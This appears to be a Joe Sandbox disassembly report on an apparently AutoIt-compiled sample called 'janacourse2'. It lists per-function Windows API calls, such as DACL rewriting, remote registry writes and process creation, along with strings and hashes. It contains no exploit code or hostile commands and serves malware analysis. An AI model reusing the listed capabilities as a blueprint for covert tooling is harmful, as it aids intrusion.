                                                                                                              • Part of subcall function 010110F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,01010B9B,?,?,?), ref: 01011136
                                                                                                              • Part of subcall function 010110F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0101114D
                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 01010DF5
                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 01010E29
                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 01010E40
                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 01010E7A
                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 01010E96
                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 01010EAD
                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 01010EB5
                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 01010EBC
                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 01010EDD
                                                                                                            • CopySid.ADVAPI32(00000000), ref: 01010EE4
                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 01010F13
                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 01010F35
                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 01010F47
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01010F6E
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 01010F75
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01010F7E
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 01010F85
                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01010F8E
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 01010F95
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 01010FA1
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 01010FA8
                                                                                                              • Part of subcall function 01011193: GetProcessHeap.KERNEL32(00000008,01010BB1,?,00000000,?,01010BB1,?), ref: 010111A1
                                                                                                              • Part of subcall function 01011193: HeapAlloc.KERNEL32(00000000,?,00000000,?,01010BB1,?), ref: 010111A8
                                                                                                              • Part of subcall function 01011193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,01010BB1,?), ref: 010111B7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 4175595110-0
                                                                                                            • Opcode ID: 3a61fb9ed5fc9545b4d5619290c839e68bb4d41a31fd28cd272c79e823f7c891
                                                                                                            • Instruction ID: 064c7c1203423fb2cc581cdf7d199a012fc6c49d5c8a69653a78f81ae9664576
                                                                                                            • Opcode Fuzzy Hash: 3a61fb9ed5fc9545b4d5619290c839e68bb4d41a31fd28cd272c79e823f7c891
                                                                                                            • Instruction Fuzzy Hash: 52718EB190120AABEB209FA5DD45FEEBBB8BF05300F044159FA99E7188D7399945CB60
                                                                                                            APIs
                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103C4BD
                                                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,0104CC08,00000000,?,00000000,?,?), ref: 0103C544
                                                                                                            • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0103C5A4
                                                                                                            • _wcslen.LIBCMT ref: 0103C5F4
                                                                                                            • _wcslen.LIBCMT ref: 0103C66F
                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0103C6B2
                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0103C7C1
                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0103C84D
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0103C881
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0103C88E
                                                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0103C960
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                            • API String ID: 9721498-966354055
                                                                                                            • Opcode ID: 36f623419a91d0d4daa6381ca84ebcc922d094a65d36c5117c5a8290b01a8849
                                                                                                            • Instruction ID: 1d9f2ba5476e91c3473a98e3a5631da5325cb2826f06f1693db312dd1b0211fb
                                                                                                            • Opcode Fuzzy Hash: 36f623419a91d0d4daa6381ca84ebcc922d094a65d36c5117c5a8290b01a8849
                                                                                                            • Instruction Fuzzy Hash: B8129D352042019FE714DF15C981A6AB7E5FF88314F08889DF88A9B3A2DB35ED41DB91
                                                                                                            APIs
                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 010409C6
                                                                                                            • _wcslen.LIBCMT ref: 01040A01
                                                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01040A54
                                                                                                            • _wcslen.LIBCMT ref: 01040A8A
                                                                                                            • _wcslen.LIBCMT ref: 01040B06
                                                                                                            • _wcslen.LIBCMT ref: 01040B81
                                                                                                              • Part of subcall function 00FCF9F2: _wcslen.LIBCMT ref: 00FCF9FD
                                                                                                              • Part of subcall function 01012BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 01012BFA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                            • API String ID: 1103490817-4258414348
                                                                                                            • Opcode ID: 1bc875cd8d9bcc4176d3afa9f212057acfdf09164f9c30a79db41f665bf25a38
                                                                                                            • Instruction ID: c2f18390bf77bf6a20c2500dc6508136719aa3580f18d336db57655ef950cc43
                                                                                                            • Opcode Fuzzy Hash: 1bc875cd8d9bcc4176d3afa9f212057acfdf09164f9c30a79db41f665bf25a38
                                                                                                            • Instruction Fuzzy Hash: 0AE1A0752083018FC714EF29C8909AEB7E1BF88354B0489ADF9D6AB366D735ED45CB81
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharUpper
                                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                            • API String ID: 1256254125-909552448
                                                                                                            • Opcode ID: ccb0398b03bd8f699c12bd887018aed7a65a93f82bc45fbc57e1262dc5cca5c2
                                                                                                            • Instruction ID: abb7730dcf61cb7faf0b9e49bb08f61defc1c869a0e5702ac75ef0c1488f8a6d
                                                                                                            • Opcode Fuzzy Hash: ccb0398b03bd8f699c12bd887018aed7a65a93f82bc45fbc57e1262dc5cca5c2
                                                                                                            • Instruction Fuzzy Hash: 8E712632A0052A8BEB21DE3CCE515BE33D9AFD0694F15055AF8D2F7286E635CD46D3A0
                                                                                                            APIs
                                                                                                            • _wcslen.LIBCMT ref: 0104835A
                                                                                                            • _wcslen.LIBCMT ref: 0104836E
                                                                                                            • _wcslen.LIBCMT ref: 01048391
                                                                                                            • _wcslen.LIBCMT ref: 010483B4
                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 010483F2
                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0104361A,?), ref: 0104844E
                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 01048487
                                                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 010484CA
                                                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 01048501
                                                                                                            • FreeLibrary.KERNEL32(?), ref: 0104850D
                                                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0104851D
                                                                                                            • DestroyIcon.USER32(?), ref: 0104852C
                                                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 01048549
                                                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 01048555
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                            • String ID: .dll$.exe$.icl
                                                                                                            • API String ID: 799131459-1154884017
                                                                                                            • Opcode ID: 944b5b08399b7ef7eee41967af3fe388b9fad84d5a25b8fbae69b18cd54975ef
                                                                                                            • Instruction ID: d056396e30106776f8a75604908a11c3c17537e9ec230d124a8605a5c87b3850
                                                                                                            • Opcode Fuzzy Hash: 944b5b08399b7ef7eee41967af3fe388b9fad84d5a25b8fbae69b18cd54975ef
                                                                                                            • Instruction Fuzzy Hash: 356126B1900204BFEB24CFA4CDC1BBE77A8BF04711F00895AF995D61C1DB79A980DBA0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                            • API String ID: 0-1645009161
                                                                                                            • Opcode ID: 0a6bd7b6a6b3c679ea0a1f87062892eb9463447ffd3b96d36b6a3880fe8daa32
                                                                                                            • Instruction ID: 923af481db5930e64d7bbd155a29cfb2040c028c8dc6cb51c28513675a97bf9f
                                                                                                            • Opcode Fuzzy Hash: 0a6bd7b6a6b3c679ea0a1f87062892eb9463447ffd3b96d36b6a3880fe8daa32
                                                                                                            • Instruction Fuzzy Hash: 228118B1A04709BBDB20BF62CC42FFE77A5AF55700F144025FA05AA192EB74D911FB91
                                                                                                            APIs
                                                                                                            • LoadIconW.USER32(00000063), ref: 01015A2E
                                                                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 01015A40
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 01015A57
                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 01015A6C
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 01015A72
                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 01015A82
                                                                                                            • SetWindowTextW.USER32(00000000,?), ref: 01015A88
                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 01015AA9
                                                                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 01015AC3
                                                                                                            • GetWindowRect.USER32(?,?), ref: 01015ACC
                                                                                                            • _wcslen.LIBCMT ref: 01015B33
                                                                                                            • SetWindowTextW.USER32(?,?), ref: 01015B6F
                                                                                                            • GetDesktopWindow.USER32 ref: 01015B75
                                                                                                            • GetWindowRect.USER32(00000000), ref: 01015B7C
                                                                                                            • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 01015BD3
                                                                                                            • GetClientRect.USER32(?,?), ref: 01015BE0
                                                                                                            • PostMessageW.USER32(?,00000005,00000000,?), ref: 01015C05
                                                                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 01015C2F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 895679908-0
                                                                                                            • Opcode ID: 89d914ecc9f0c55888be6f3247fd1c93b10216dcdfcdcfe88d64eb8c89118adf
                                                                                                            • Instruction ID: 6e6f5d4c0a09f237421ad572a5fabe5dbe847e77acc62d5c98e4101fd6ad29e3
                                                                                                            • Opcode Fuzzy Hash: 89d914ecc9f0c55888be6f3247fd1c93b10216dcdfcdcfe88d64eb8c89118adf
                                                                                                            • Instruction Fuzzy Hash: 41717C71900709AFEB20DFA8CE85AAEBBF5FF88704F104958E582A7594D779E940CF50
                                                                                                            APIs
                                                                                                            • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00FD00C6
                                                                                                              • Part of subcall function 00FD00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0108070C,00000FA0,85A7DEC7,?,?,?,?,00FF23B3,000000FF), ref: 00FD011C
                                                                                                              • Part of subcall function 00FD00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00FF23B3,000000FF), ref: 00FD0127
                                                                                                              • Part of subcall function 00FD00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00FF23B3,000000FF), ref: 00FD0138
                                                                                                              • Part of subcall function 00FD00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00FD014E
                                                                                                              • Part of subcall function 00FD00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00FD015C
                                                                                                              • Part of subcall function 00FD00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00FD016A
                                                                                                              • Part of subcall function 00FD00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FD0195
                                                                                                              • Part of subcall function 00FD00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00FD01A0
                                                                                                            • ___scrt_fastfail.LIBCMT ref: 00FD00E7
                                                                                                              • Part of subcall function 00FD00A3: __onexit.LIBCMT ref: 00FD00A9
                                                                                                            Strings
                                                                                                            • WakeAllConditionVariable, xrefs: 00FD0162
                                                                                                            • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00FD0122
                                                                                                            • InitializeConditionVariable, xrefs: 00FD0148
                                                                                                            • SleepConditionVariableCS, xrefs: 00FD0154
                                                                                                            • kernel32.dll, xrefs: 00FD0133
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                            • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                            • API String ID: 66158676-1714406822
                                                                                                            • Opcode ID: ca32bff215e006c03162dd4f2890d317b80392504f70edf3281629bf9ac310ac
                                                                                                            • Instruction ID: 4003dd124960342809d289a81138e6d6c6b073495ebfcf6bf00558d84cf42b96
                                                                                                            • Opcode Fuzzy Hash: ca32bff215e006c03162dd4f2890d317b80392504f70edf3281629bf9ac310ac
                                                                                                            • Instruction Fuzzy Hash: C1210AB2E457116BE7207B65AE46B6D7396EB05B61F04013FF8C196344DE798C009B90
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                            • API String ID: 176396367-1603158881
                                                                                                            • Opcode ID: 8ab1d09c43c97edd7421e581d4366c7c542dffcc632b95282a69947fbfbe2146
                                                                                                            • Instruction ID: 88ac7a533297c9eeed562417c2a635ccba393f96ee726678ec8b67bc2f7b9c86
                                                                                                            • Opcode Fuzzy Hash: 8ab1d09c43c97edd7421e581d4366c7c542dffcc632b95282a69947fbfbe2146
                                                                                                            • Instruction Fuzzy Hash: 46E10332A001169BDB199FA8C841BFEFBB5BF04720F14815AE496EB244DF38A945DB90
                                                                                                            APIs
                                                                                                            • CharLowerBuffW.USER32(00000000,00000000,0104CC08), ref: 01024527
                                                                                                            • _wcslen.LIBCMT ref: 0102453B
                                                                                                            • _wcslen.LIBCMT ref: 01024599
                                                                                                            • _wcslen.LIBCMT ref: 010245F4
                                                                                                            • _wcslen.LIBCMT ref: 0102463F
                                                                                                            • _wcslen.LIBCMT ref: 010246A7
                                                                                                              • Part of subcall function 00FCF9F2: _wcslen.LIBCMT ref: 00FCF9FD
                                                                                                            • GetDriveTypeW.KERNEL32(?,01076BF0,00000061), ref: 01024743
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            • Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                            • API String ID: 2055661098-1000479233
                                                                                                            • Opcode ID: b90d188f1ed5a0ae63ed8ddf07b3c92cbc504693b0c91651c70a32165bacc450
                                                                                                            • Instruction ID: 13f53743fbf4dd83bea2062eb0792287fb5b29f3210a1d075aed1e93228d345f
                                                                                                            • Opcode Fuzzy Hash: b90d188f1ed5a0ae63ed8ddf07b3c92cbc504693b0c91651c70a32165bacc450
                                                                                                            • Instruction Fuzzy Hash: 07B1EE716083229BC720DF29C890A6EB7E5BF99720F40495DF5E6C7292D774D884CAA2
APIs
• _wcslen.LIBCMT ref: 0103B198
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0103B1B0
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0103B1D4
• _wcslen.LIBCMT ref: 0103B200
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0103B214
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0103B236
• _wcslen.LIBCMT ref: 0103B332
  • Part of subcall function 010205A7: GetStdHandle.KERNEL32(000000F6), ref: 010205C6
• _wcslen.LIBCMT ref: 0103B34B
• _wcslen.LIBCMT ref: 0103B366
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0103B3B6
• GetLastError.KERNEL32(00000000), ref: 0103B407
• CloseHandle.KERNEL32(?), ref: 0103B439
• CloseHandle.KERNEL32(00000000), ref: 0103B44A
• CloseHandle.KERNEL32(00000000), ref: 0103B45C
• CloseHandle.KERNEL32(00000000), ref: 0103B46E
• CloseHandle.KERNEL32(?), ref: 0103B4E3
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.0000000001084000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652323372.00000000010C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fb0000_janacourse2.jbxd
Similarity
• API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
• String ID:
• API String ID: 2178637699-0
• Opcode ID: ada7d1a446d60b042dd4af32fd7eeecf518dfd609b8521f087c2a670afe23d9c
• Instruction ID: e993674fb87aca36835344704f9b58eb36de894d020dfa1cad1d997067fe3e49
• Opcode Fuzzy Hash: ada7d1a446d60b042dd4af32fd7eeecf518dfd609b8521f087c2a670afe23d9c
• Instruction Fuzzy Hash: 04F1AE716083009FD724EF29C891B6EBBE9AFC5314F18855DF9958B2A6CB35E804CB52
APIs
• GetMenuItemCount.USER32(01081990), ref: 00FF2F8D
• GetMenuItemCount.USER32(01081990), ref: 00FF303D
• GetCursorPos.USER32(?), ref: 00FF3081
• SetForegroundWindow.USER32(00000000), ref: 00FF308A
• TrackPopupMenuEx.USER32(01081990,00000000,?,00000000,00000000,00000000), ref: 00FF309D
• PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FF30A9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1652194954.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
• Associated: 00000000.00000002.1652181415.0000000000FB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.000000000104C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652236657.0000000001072000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1652309775.000000000107C000.00000004.00000001.01000000.00000003.sdmp
